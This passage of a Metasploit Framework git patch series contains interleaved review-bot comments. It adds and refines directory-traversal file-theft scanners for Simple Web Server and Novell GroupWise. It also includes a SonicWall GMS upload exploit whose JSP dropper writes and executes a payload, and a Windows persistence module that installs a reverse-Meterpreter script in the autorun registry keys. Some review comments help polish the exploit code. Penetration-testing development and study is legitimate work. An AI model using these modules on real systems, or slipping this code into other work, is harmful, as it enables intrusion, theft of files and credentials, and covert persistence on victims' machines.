@param req [Request,#to_s] The request to send + # @param t (see #connect) def send_request(req, t = -1) connect(t) conn.put(req.to_s) end - # Validates that the client has creds + # Validates that the client has creds def have_creds? !(self.username.nil?) && self.username != '' end @@ -420,7 +438,7 @@ def send_auth(res, opts, t, persist) else opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} end - + req = request_cgi(opts) res = _send_recv(req,t,persist) return res 
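Review bot: `send_recv` now calls `req.options` on the 401 path, but the doc added to `send_request` in this commit advertises `[Request,#to_s]`, and a plain String has no `options` method while a `Request` created elsewhere has it unset. With credentials configured, such a caller would hit a NoMethodError, or `send_auth` would receive nil and fail on `opts['headers']`. Extending the condition keeps the non-auth path working: `if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? and req.respond_to?(:options) and req.options`. `send_auth` starts outside the last hunk.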
@@ -628,7 +646,7 @@ def negotiate_auth(opts={}) opts['password'] ||= self.password.to_s if opts['provider'] and opts['provider'].include? 'Negotiate' - provider = "Negotiate " + provider = "Negotiate " else provider = 'NTLM ' end diff --git a/lib/rex/proto/http/request.rb b/lib/rex/proto/http/request.rb index 45d13b2baed4..af88fdcb68da 100644 --- a/lib/rex/proto/http/request.rb +++ b/lib/rex/proto/http/request.rb @@ -48,6 +48,8 @@ def initialize(uri = '/', proto = DefaultProtocol) end end + attr_accessor :options + # # Initializes an instance of an HTTP request with the supplied method, URI, # and protocol. From b6c6397da3aa5e4befb8b3c277fb994359da1719 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Wed, 6 Feb 2013 19:21:20 -0600 Subject: [PATCH 301/421] typo --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 175e676f4aaf..66311f1310bd 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -186,7 +186,7 @@ def exploit }).to_s File.open("foo.war", "wb") { |fd| fd.write(war) } - dropper = jsp_bin_dopper(war, "#{install_path}webapps/foo.war") + dropper = jsp_bin_dropper(war, "#{install_path}webapps/foo.war") upload_file("#{install_path}webapps/appliance", "foo-dropper.jsp", dropper) send_request_cgi( { @@ -201,7 +201,7 @@ def exploit }) end - def jsp_bin_dopper(bin_data, output_file) + def jsp_bin_dropper(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| From 77390a5935397b7e378f471562587f9f15855405 Mon Sep 17 00:00:00 2001 
From: HD Moore <hd_moore@rapid7.com> Date: Wed, 6 Feb 2013 23:34:55 -0600 Subject: [PATCH 302/421] Fix a bug reported by Tom Liston --- modules/auxiliary/server/capture/smb.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/server/capture/smb.rb b/modules/auxiliary/server/capture/smb.rb index af2cfc586288..74c5d11bf488 100644 --- a/modules/auxiliary/server/capture/smb.rb +++ b/modules/auxiliary/server/capture/smb.rb @@ -614,7 +614,7 @@ def smb_get_hash(smb, arg = {}, esn=true) smb[:domain] ? smb[:domain] : "NULL", @challenge.unpack("H*")[0], nt_hash.empty? ? "0" * 32 : nt_hash, - nt_cli_challenge ? "0" * 160 : nt_cli_challenge + nt_cli_challenge.empty? ? "0" * 160 : nt_cli_challenge ].join(":").gsub(/\n/, "\\n") ) fd.close From a3264e18e2f3257a2428e10dd1b42bad35c5eb7b Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 10:30:17 -0600 Subject: [PATCH 303/421] There aint no fail_with(), must use print_error --- modules/auxiliary/scanner/http/simple_webserver_traversal.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index a4cf884e184d..bd46af181427 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -55,7 +55,8 @@ def parse_status_line(res) status_line = str.scan(/HTTP\/(.+?)\s+(\d+)\s?(.+?)\r?\n?$/) if status_line.empty? - fail_with(Exploit::Failure::Unknown, "Invalid response command string.") + print_error("Invalid response command string.") + return elsif status_line.length == 1 proto, code, message = status_line[0] else From b11f05274680457309baf4ba428eb143d5cf1fdc Mon Sep 17 00:00:00 2001 
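Review bot: `nt_cli_challenge.empty?` raises NoMethodError if `nt_cli_challenge` can be nil here; the replaced line tested plain truthiness, which suggests nil was at least considered (the assignment is outside the hunk, so this is inferred). `nt_cli_challenge.to_s.empty? ? "0" * 160 : nt_cli_challenge` covers both nil and the empty string. The same applies to `nt_hash.empty?` on the line above. smb_get_hash starts and ends outside the hunk.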
From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 10:32:29 -0600 Subject: [PATCH 304/421] Allow arbitrary depth --- modules/auxiliary/scanner/http/simple_webserver_traversal.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index bd46af181427..b045ffb9c330 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -37,7 +37,8 @@ def initialize(info = {}) register_options( [ - OptString.new('FILEPATH', [true, 'The name of the file to download', 'boot.ini']) + OptString.new('FILEPATH', [true, 'The name of the file to download', 'boot.ini']), + OptInt.new('DEPTH', [true, 'The max traversal depth', 8]) ], self.class) deregister_options('RHOST') @@ -77,7 +78,7 @@ def parse_body(res) def run_host(ip) - uri = normalize_uri("../"*8, datastore['FILEPATH']) + uri = normalize_uri("../"*datastore['DEPTH'], datastore['FILEPATH']) res = send_request_raw({'uri'=>uri}) if not res From 98559d4d51673f223e5a483c81c18656deac6762 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 10:45:53 -0600 Subject: [PATCH 305/421] Do a check and make sure this is Simple Web Server --- .../http/simple_webserver_traversal.rb | 37 ++++++++++++++++++- 1 file changed, 36 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index b045ffb9c330..6988c85e769a 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb 
@@ -77,7 +77,22 @@ def parse_body(res) end + def is_sws? + res = send_request_raw({'uri'=>'/'}) + if res and res.headers['Server'].to_s =~ /PMSoftware\-SWS/ + return true + else + return false + end + end + + def run_host(ip) + if not is_sws? + print_error("#{ip}:#{rport} - This isn't a Simple Web Server") + return + end + uri = normalize_uri("../"*datastore['DEPTH'], datastore['FILEPATH']) res = send_request_raw({'uri'=>uri}) @@ -105,4 +120,24 @@ def run_host(ip) print_error("#{ip}:#{rport} - Unable to retrieve file: #{code.to_s} (#{message})") end end -end \ No newline at end of file +end + +=begin +Vulnerable: +< HTTP/1.1 200 Ok +< Server: PMSoftware-SWS/2.3 +< Date: Thu, 07 Feb 2013 16:34:6 GMT +< Accept-Ranges: bytes +< Content-type: text/html +< Content-Length: 1550 + +Not vulnerable: + +< HTTP/1.1 200 Ok +< Server: PMSoftware-SWS/2.3 +< Date: Thu, 07 Feb 2013 16:39:53 GMT +< Accept-Ranges: bytes +< Content-type: text/html +< Content-Length: 1550 + +=end \ No newline at end of file From d554c3a56a2ffb1420ecde75a1b4e1fc196a4f65 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 10:46:42 -0600 Subject: [PATCH 306/421] Don't really need the bottom comment --- .../http/simple_webserver_traversal.rb | 19 ------------------- 1 file changed, 19 deletions(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index 6988c85e769a..d98e6f38fed1 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb 
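Review bot: `is_sws?` returns false both when the `Server` header does not match and when `send_request_raw` returns nil, so `run_host` reports a host that timed out as "This isn't a Simple Web Server". Handling nil separately, reusing the existing `Request timed out.` message, would keep scan output accurate. The predicate itself can be reduced to `!!(res and res.headers['Server'].to_s =~ /PMSoftware\-SWS/)`. The same pattern is added as `is_groupwise?` in PATCH 309.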
@@ -122,22 +122,3 @@ def run_host(ip) end end -=begin -Vulnerable: -< HTTP/1.1 200 Ok -< Server: PMSoftware-SWS/2.3 -< Date: Thu, 07 Feb 2013 16:34:6 GMT -< Accept-Ranges: bytes -< Content-type: text/html -< Content-Length: 1550 - -Not vulnerable: - -< HTTP/1.1 200 Ok -< Server: PMSoftware-SWS/2.3 -< Date: Thu, 07 Feb 2013 16:39:53 GMT -< Accept-Ranges: bytes -< Content-type: text/html -< Content-Length: 1550 - -=end \ No newline at end of file From 7f746e1caa22082af46ce5d6cd1867f6aca7c95c Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 11:13:18 -0600 Subject: [PATCH 307/421] That's what he said. --- modules/auxiliary/scanner/http/simple_webserver_traversal.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb index d98e6f38fed1..3de0b7399b86 100644 --- a/modules/auxiliary/scanner/http/simple_webserver_traversal.rb +++ b/modules/auxiliary/scanner/http/simple_webserver_traversal.rb @@ -108,7 +108,8 @@ def run_host(ip) if code == 200 if body.empty? - print_status("#{ip}:#{rport} - File is empty.") + # HD's likes vprint_* in case it's hitting a large network + vprint_status("#{ip}:#{rport} - File is empty.") return end From 0d3c32b0a43b170cd4819c3cd0aee84684b9fad8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 7 Feb 2013 21:15:49 +0100 Subject: [PATCH 308/421] Added module for CVE-2012-0419 --- .../http/groupwise_agents_http_traversal.rb | 82 +++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb diff --git a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb new file mode 100644 index 000000000000..47b4f1ec8f02 --- /dev/null +++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb 
@@ -0,0 +1,82 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell Groupwise Agents HTTP Directory Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability in Novell Groupwise. + The vulnerability exists in the web interface of both the Post Office and the + MTA agents. This module has been tested successfully on Novell Groupwise 8.02 HP2 + over Windows 2003 SP2. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'r () b13$', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-0419' ], + [ 'OSVDB', '85801' ], + [ 'BID', '55648' ], + [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7010772' ] + ] + )) + + register_options( + [ + Opt::RPORT(7181), # Also 7180 can be used + OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']), + OptInt.new('DEPTH', [true, 'Traversal depth if absolute is set to false', 10]) + ], self.class) + end + + def run_host(ip) + # No point to continue if no filename is specified + if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty? 
+ vprint_error("#{rhost}:#{rport} - Please supply FILEPATH") + return + end + + travs = "" + travs << "../" * datastore['DEPTH'] + + travs = normalize_uri("/help/", travs, datastore['FILEPATH']) + + vprint_status("#{rhost}:#{rport} - Sending request...") + res = send_request_cgi({ + 'uri' => travs, + 'method' => 'GET', + }) + + if res and res.code == 200 + contents = res.body + fname = File.basename(datastore['FILEPATH']) + path = store_loot( + 'novell.groupwise', + 'application/octet-stream', + ip, + contents, + fname + ) + print_good("#{rhost}:#{rport} - File saved in: #{path}") + else + vprint_error("#{rhost}:#{rport} - Failed to retrieve file") + return + end + end +end From e9912496d88923308f70ced8f0c66973873f6476 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 7 Feb 2013 22:05:39 +0100 Subject: [PATCH 309/421] nice check learned from sinn3r --- .../http/groupwise_agents_http_traversal.rb | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb index 47b4f1ec8f02..1cd2f5df0752 100644 --- a/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb +++ b/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb @@ -45,10 +45,19 @@ def initialize(info = {}) ], self.class) end + def is_groupwise? + res = send_request_raw({'uri'=>'/'}) + if res and res.headers['Server'].to_s =~ /GroupWise/ + return true + else + return false + end + end + def run_host(ip) - # No point to continue if no filename is specified - if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty? - vprint_error("#{rhost}:#{rport} - Please supply FILEPATH") + + if not is_groupwise? + vprint_error("#{rhost}:#{rport} - This isn't a GroupWise Agent HTTP Interface") return end From 13d104598903fb02837aaf508ee0df84704cf677 Mon Sep 17 00:00:00 2001 
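Review bot: The description of the new `DEPTH` option, 'Traversal depth if absolute is set to false', refers to an `absolute` setting that this module never registers; the only options added are RPORT, FILEPATH and DEPTH. Suggest `OptInt.new('DEPTH', [true, 'Traversal depth', 10])`. The inline comment `# Also 7180 can be used` would also read better as part of the RPORT help text, since users see option descriptions and not source comments.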
From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 16:56:38 -0600 Subject: [PATCH 310/421] Works for java and native linux targets --- lib/msf/core/payload/java.rb | 17 ++- .../multi/http/sonicwall_gms_upload.rb | 109 ++++++++++++------ 2 files changed, 84 insertions(+), 42 deletions(-) diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb index 824db13b0865..851ffb4aaade 100644 --- a/lib/msf/core/payload/java.rb +++ b/lib/msf/core/payload/java.rb @@ -35,15 +35,14 @@ def generate end # - # Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define - # a list of class files in @class_files which are pulled from - # Msf::Config.data_directory. The configuration file is created by the - # payload's #config method. - # - # +opts+ can include: - # +:main_class+:: the name of the Main-Class attribute in the manifest. - # Defaults to "metasploit.Payload" + # Used by stagers to create a jar file as a {Rex::Zip::Jar}. Stagers + # define a list of class files in @class_files which are pulled from + # {Msf::Config.data_directory}. The configuration file is created by + # the payload's #config method. # + # @option opts :main_class [String] the name of the Main-Class + # attribute in the manifest. Defaults to "metasploit.Payload" + # @return [Rex::Zip::Jar] def generate_jar(opts={}) raise if not respond_to? :config # Allow changing the jar's Main Class in the manifest so wrappers @@ -63,7 +62,7 @@ def generate_jar(opts={}) end # - # Like #generate_jar, this method is used by stagers to create a war file + # Like {#generate_jar}, this method is used by stagers to create a war file # as a Rex::Zip::Jar object. # # @param opts [Hash] diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 66311f1310bd..27f928b9bd4d 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb 
@@ -79,10 +79,12 @@ def initialize(info = {}) end - def get_install_path + def install_path + return @install_path if @install_path + res = send_request_cgi( { - 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'uri' => normalize_uri(target_uri.path,"appliance","applianceMainPage") + "?skipSessionCheck=1", 'method' => 'POST', 'connection' => 'TE, close', 'headers' => @@ -99,11 +101,12 @@ def get_install_path } }) + @install_path = nil if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/ - return $1 + @install_path = $1 end - return nil + @install_path end def upload_file(location, filename, contents) @@ -113,12 +116,13 @@ def upload_file(location, filename, contents) post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"") post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"") + # Work around an incompatible MIME implementation data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi( { - 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'uri' => normalize_uri(target_uri.path, "appliance","applianceMainPage") + "?skipSessionCheck=1", 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", @@ -128,11 +132,7 @@ def upload_file(location, filename, contents) }, 'connection' => 'TE, close' }) - if target['Platform'] == "win" - register_files_for_cleanup("#{location}\\#{filename}") - else - register_files_for_cleanup("#{location}/#{filename}") - end + register_files_for_cleanup(path_join(location, filename)) if res and res.code == 200 and res.body.empty? return true @@ -143,10 +143,8 @@ def upload_file(location, filename, contents) def check @peer = "#{rhost}:#{rport}" - @uri = normalize_uri(target_uri.path) - @uri << '/' if @uri[-1,1] != '/' - if get_install_path.nil? + if install_path.nil? return Exploit::CheckCode::Safe end 
@@ -155,12 +153,9 @@ def check def exploit @peer = "#{rhost}:#{rport}" - @uri = normalize_uri(target_uri.path) - @uri << '/' if @uri[-1,1] != '/' # Get Tomcat installation path print_status("#{@peer} - Retrieving Tomcat installation path...") - install_path = get_install_path if install_path.nil? fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") 
@@ -168,40 +163,74 @@ def exploit print_good("#{@peer} - Tomcat installed on #{install_path}") - if target['Platform'] == "linux" - @location = "#{install_path}webapps/appliance/" - elsif target['Platform'] == "win" - @location = "#{install_path}webapps\\appliance\\" + if target['Platform'] == "java" + exploit_java + else + exploit_native end + end - # Generate the WAR containing the EXE containing the payload + def exploit_java jsp_name = "index" - app_base = rand_text_alphanumeric(4+rand(32-4)) + #app_base = rand_text_alphanumeric(4+rand(32-4)) + app_base = "foo" war = payload.encoded_war({ - :app_name => app_base, - :jsp_name => jsp_name, - :arch => target.arch, - :platform => target.platform - }).to_s + :app_name => app_base, + :jsp_name => jsp_name, + }).to_s File.open("foo.war", "wb") { |fd| fd.write(war) } - dropper = jsp_bin_dropper(war, "#{install_path}webapps/foo.war") - upload_file("#{install_path}webapps/appliance", "foo-dropper.jsp", dropper) + war_filename = path_join(install_path, "webapps","#{app_base}.war") + dropper = jsp_drop_bin(war, war_filename) + dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" + + upload_file(path_join(install_path,"webapps","appliance"), dropper_filename, dropper) send_request_cgi( { - 'uri' => normalize_uri("#{@uri}appliance/foo-dropper.jsp"), + 'uri' => normalize_uri(target_uri.path, "appliance", dropper_filename), 'method' => 'GET' }) + send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), + 'method' => 'GET' + }) + end + + + def exploit_native + dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" + exe = payload.encoded_exe + exe_filename = Rex::Text.rand_text_alpha(8) + if target['Platform'] == "win" + exe << ".exe" + end + dropper = jsp_drop_and_execute(exe, "#{install_path}#{exe_filename}") + + upload_file(path_join(install_path,"webapps","appliance"), dropper_filename, dropper) send_request_cgi( { - 'uri' => 
normalize_uri("#{target_uri.path}/foo/#{app_base}/#{jsp_name}.jsp"), + 'uri' => normalize_uri(target_uri.path, "appliance", dropper_filename), 'method' => 'GET' }) + + end + + def path_join(*paths) + if target['Platform'] == "win" + path = paths.join("\\") + path.gsub!(%r|\\+|, "\\") + else + path = paths.join("/") + path.gsub!(%r|//+|, "/") + end + + path end - def jsp_bin_dropper(bin_data, output_file) + def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| @@ -223,9 +252,23 @@ def jsp_bin_dropper(bin_data, output_file) jspraw << %Q|outputstream.write(bytes);\n| jspraw << %Q|outputstream.close();\n| + jspraw << %Q|%>\n| + + jspraw + end + def jsp_execute_command(command) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|Runtime.getRuntime().exec("chmod +x #{command}");\n| + jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| - return jspraw + + jspraw + end + + def jsp_drop_and_execute(bin_data, output_file) + jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file) end end From 19e989dff9b1c3eae565a1dc421219e8236d6fc8 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 7 Feb 2013 19:11:44 -0400 Subject: [PATCH 311/421] Initial commit fo the migrated module --- modules/exploits/windows/local/persistence.rb | 214 ++++++++++++++++++ 1 file changed, 214 insertions(+) create mode 100644 modules/exploits/windows/local/persistence.rb diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb new file mode 100644 index 000000000000..336c8678b6f9 --- /dev/null +++ b/modules/exploits/windows/local/persistence.rb 
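Review bot: `exploit_java` still carries debugging leftovers. `File.open("foo.war", "wb") { |fd| fd.write(war) }` writes the generated archive into whatever directory the console was started from, and `app_base = "foo"` sits directly under the commented-out original assignment. Drop the `File.open` line and keep only one of the two `app_base` lines before merging. Separately, `war_filename` is never passed to `register_files_for_cleanup`, so the deployed archive stays on the tested host after the session ends, unlike the dropper JSP that `upload_file` registers.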
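Review bot: `jsp_execute_command` interpolates `command` unescaped into two Java string literals, `exec("chmod +x #{command}")` and `exec("#{command}")`. On the Windows target the path is expected to contain backslashes (`path_join` joins with `\` there), and a backslash or double quote inside a Java literal changes or breaks the generated source. The value should be escaped for a Java string before interpolation. The `chmod +x` line is also emitted regardless of `target['Platform']` and should be guarded the way `path_join` is. `jsp_drop_bin` begins outside this hunk.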
@@ -0,0 +1,214 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/windows/priv' +require 'msf/core/post/windows/registry' +require 'msf/core/exploit/exe' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Post::Windows::Registry + include Exploit::EXE + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Persistent Payload Installer', + 'Description' => %q{ + This Module will create a boot persistent reverse Meterpreter session by + installing on the target host the payload as a script that will be executed + at user logon or system startup depending on privilege and selected startup + method. + + REXE mode will transfer a binary of your choosing to remote host to be + used as a payload. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Carlos Perez <carlos_perez[at]darkoperator.com>' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> "Oct 19 2011" + )) + + register_options( + [ + OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]), + OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]), + OptString.new('REXENAME',[false, 'The name to call payload on remote system.','']), + OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']), + ], self.class) + + end + + # Run Method for when run command is issued + #------------------------------------------------------------------------------- + def exploit + print_status("Running module against #{sysinfo['Computer']}") + + rexe = datastore['EXE::Custom'] + rexename = datastore['REXENAME'] + delay = datastore['DELAY'] + reg_val = datastore['REG_NAME'] + template_pe = datastore['EXE::Template'] + @clean_up_rc = "" + host,port = session.session_host, session.session_port + + if rexe.nil? 
+ script = create_script(delay, template_pe) + script_on_target = write_script_to_target(script,rexename) + else + alt_pay_exe = get_custom_exe + script_on_target = write_exe_to_target(alt_pay_exe, rexename) + end + + # Initial execution of script + target_exec(script_on_target) + + case datastore['STARTUP'] + when /USER/i + write_to_reg("HKCU", script_on_target, reg_val) + when /SYSTEM/i + write_to_reg("HKLM", script_on_target, reg_val) + end + + clean_rc = log_file() + file_local_write(clean_rc,@clean_up_rc) + print_status("Cleanup Meterpreter RC File: #{clean_rc}") + + report_note(:host => host, + :type => "host.persistance.cleanup", + :data => { + :local_id => session.sid, + :stype => session.type, + :desc => session.info, + :platform => session.platform, + :via_payload => session.via_payload, + :via_exploit => session.via_exploit, + :created_at => Time.now.utc, + :commands => @clean_up_rc + } + ) + end + + # Function for Creating persistent script + #------------------------------------------------------------------------------- + def create_script(delay, altexe) + if not altexe.nil? 
+ vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe}) + else + vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay}) + end + print_status("Persistent agent script is #{vbs.length} bytes long") + return vbs + end + + # Function for creating log folder and returning log path + #------------------------------------------------------------------------------- + def log_file(log_path = nil) + #Get hostname + host = session.sys.config.sysinfo["Computer"] + + # Create Filename info to be appended to downloaded files + filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") + + # Create a directory for the logs + if log_path + logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) ) + else + logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) ) + end + + # Create the log directory + ::FileUtils.mkdir_p(logs) + + #logfile name + logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc" + return logfile + end + + # Function for writing script to target host + #------------------------------------------------------------------------------- + def write_script_to_target(vbs,name) + tempdir = session.fs.file.expand_path("%TEMP%") + if name.nil? 
+ tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" + else + tempvbs = tempdir + "\\" + name + ".vbs" + end + fd = session.fs.file.new(tempvbs, "wb") + fd.write(vbs) + fd.close + print_good("Persistent Script written to #{tempvbs}") + @clean_up_rc << "rm #{tempvbs}\n" + return tempvbs + end + + # Function to execute script on target and return the PID of the process + #------------------------------------------------------------------------------- + def target_exec(script_on_target) + print_status("Executing script #{script_on_target}") + if datastore['EXE::Custom'].nil? + proc = session.sys.process.execute(script_on_target, nil, {'Hidden' => true}) + else + proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true}) + end + + print_good("Agent executed with PID #{proc.pid}") + @clean_up_rc << "kill #{proc.pid}\n" + return proc.pid + end + + # Function to install payload in to the registry HKLM or HKCU + #------------------------------------------------------------------------------- + def write_to_reg(key,script_on_target, registry_value) + if registry_value.nil? + nam = Rex::Text.rand_text_alpha(rand(8)+8) + else + nam = registry_value + end + + print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") + + if(key) + registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ") + print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") + else + print_error("Error: failed to open the registry key for writing") + end + end + + # Function for writing executable to target host + #------------------------------------------------------------------------------- + def write_exe_to_target(exe_raw, rexename) + if rexename.nil? 
+ exe_name = Rex::Text.rand_text_alpha(rand(8)+8) + else + exe_name = rexename + end + + tempdir = session.fs.file.expand_path("%TEMP%") + tempexe = tempdir + "\\" + exe_name + ".exe" + fd = session.fs.file.new(tempexe, "wb") + fd.write(exe_raw) + fd.close + print_good("Persistent Script written to #{tempexe}") + @clean_up_rc << "rm #{tempexe}\n" + return tempexe + end +end \ No newline at end of file From bf28be7cffaf6e33d6dd2f2f0acc73eac523ce24 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 18:36:04 -0600 Subject: [PATCH 312/421] Fix some comments that yard parsed incorrectly --- lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 1a2d5cc47841..b66fc1707e5e 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb @@ -28,7 +28,7 @@ def webcam_list names end - # Starts recording video from video source of index #{cam} + # Starts recording video from video source of index +cam+ def webcam_start(cam) request = Packet.create_request('webcam_start') request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam) @@ -48,7 +48,7 @@ def webcam_stop true end - # Record from default audio source for #{duration} seconds; + # Record from default audio source for +duration+ seconds; # returns a low-quality wav file def record_mic(duration) request = Packet.create_request('webcam_audio_record') From 